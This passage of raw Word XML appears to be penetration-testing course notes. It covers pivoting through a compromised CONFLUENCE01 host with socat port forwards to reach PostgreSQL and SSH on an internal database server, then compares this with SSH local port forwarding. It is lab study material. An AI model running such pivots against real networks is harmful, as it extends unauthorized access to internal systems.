        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that enumeration is done, we want to connect from our Kali to the psql service on PGDATABASE01 on port 5432. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will do this by pivoting from CONFLUENCE01 to PGDATABASE01, since we already have CONFLUENCE01 compromised</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="398" name="image386.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image386.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2400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We want to open TCP port 2345 on the WAN interface of CONFLUENCE01, then connect to that port from our Kali machine. We want all the packets that we send to this port to be forwarded by CONFLUENCE01 to TCP port 5432 on PGDATABASE01. Once we set up our port forward, connecting to TCP port 2345 on CONFLUENCE01 will be exactly like connecting directly to TCP port 5432 on PGDATABASE01.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, we find it already installed, but Socat does not tend to be installed by default on *NIX systems. If not already installed, it's possible to download and run a statically linked binary version instead.</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On CONFLUENCE01, we'll start a verbose (-ddd) Socat process. It will listen on TCP port 2345 (TCP-LISTEN:2345), fork into a new subprocess when it receives a connection (fork) instead of dying after a single connection, then forward all traffic it receives to TCP port 5432 on PGDATABASE01 (TCP:10.4.50.215:5432). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this command on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="338" name="image326.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image326.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the listening port on CONFLUENCE01 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll listen on port 2345 since it is outside the privileged port range (0-1024), meaning elevated privileges are not required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With the Socat process running, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine, specifying that we want to connect to CONFLUENCE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-h 192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) on port 2345 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user account (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). This will then get forwarded to PGDATABASE01!</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvwchxwoxy2b" w:id="71"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting a new socat port forward</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Now, we decide we want to connect to ANOTHER port on PGDATABASE01. More specifically port 22 for SSH. </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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to kill the original Socat process listening on TCP port 2345. We'll then create a new port forward with Socat that will listen on TCP port 2222 and forward to TCP port 22 on PGDATABASE01. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this command on CONFLUENCE01</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2222 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the port listening on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215:22 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for PGDATABASE01</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can SSH as if we had a direct connection to port 22 on PGDATABASE01. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we specify the port and IP of CONFLUENCE01.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh database_admin@192.168.50.63 -p2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is CONFLUENCE01</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Alternatives to socat:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rinetd is an option that runs as a daemon. This makes it a better solution for longer-term port forwarding configurations but is slightly unwieldy for temporary port forwarding solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can combine Netcat and a FIFO named pipe file to create a port forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we have root privileges, we could use iptables to create port forwards. The specific iptables port forwarding setup for a given host will likely depend on the configuration already in place. To be able to forward packets in Linux also requires enabling forwarding on the interface we want to forward on by writing "1" to /proc/sys/net/ipv4/conf/[interface]/forwarding (if it's not already configured to allow it).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ckod8pboxmqr" w:id="72"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Port Forwarding vs. Socat Port Forwarding</w:t>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With</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Socat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening and forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were both done from the same host (CONFLUENCE01).</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH local port forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adds a small twist to this. With SSH local port forwarding, packets are not forwarded by the same host that listens for packets. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, an SSH connection is made between two hosts (an SSH client and an SSH server),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a listening port is opened by the SSH client, and all packets received on this port are tunneled through the SSH connection to the SSH server. The packets are then forwarded by the SSH server to the socket we specify.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000805">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we have our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">middleman</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we would open SSH on our Kali (SSH client) and connect to the middleman (SSH server). All packets received on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH clien</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t (via loopback on our Kali) are then forwarded via SSH tunnel to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> And then the packets are forwarded (from SSH server) to another </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(in this case, the IP and port of the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This socket can refer to the SSH server itself or a completely different machine, anything that the SSH server can access.</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000808">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A socket is a combination of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
